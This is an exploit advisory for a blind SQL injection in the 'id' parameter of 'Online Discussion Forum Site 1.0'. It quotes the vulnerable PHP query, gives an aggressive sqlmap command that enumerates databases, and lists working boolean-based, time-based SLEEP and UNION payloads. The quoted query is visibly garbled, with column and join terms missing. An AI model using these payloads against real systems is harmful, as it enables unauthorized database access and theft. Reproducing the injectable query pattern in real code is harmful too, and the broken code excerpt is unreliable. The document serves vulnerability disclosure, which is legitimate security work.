# Exploit Title: Online Discussion Forum Site 1.0 - 'id' Blind SQL Injection  
# Date: 15/05/2022  
# Exploit Author: Saud Alenazi  
# Vendor Homepage:  
# Software Link:  
# Version: 1.0  
# Tested on: XAMPP, Linux  
# Vulnerable Code:  
line 3 in file "/odfs/posts/view_post.php"  
$qry = $conn->query("SELECT p.*, u.username, u.avatar, as `category` FROM `post_list` p inner join category_list c on p.category_id = inner join `users` u on p.user_id = where '{$_GET['id']}'");  
# Sqlmap command:  
sqlmap -u 'http://localhost/odfs/?id=1&p=posts/view_post' -p id --level=5 --risk=3 --dbs --random-agent --eta  
# Output:  
Parameter: id (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: id=1' AND 5178=5178-- Iddj&p=posts/view_post  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: id=1' AND (SELECT 6535 FROM (SELECT(SLEEP(5)))amvG)-- ikmN&p=posts/view_post  
Type: UNION query  
Title: Generic UNION query (NULL) - 12 columns  
Payload: id=-3669' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71716a7671,0x65776b4d4272577956694c6549674a64546761564c79566d556255634a426c7a66464e6e527a4779,0x71767a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&p=posts/view_post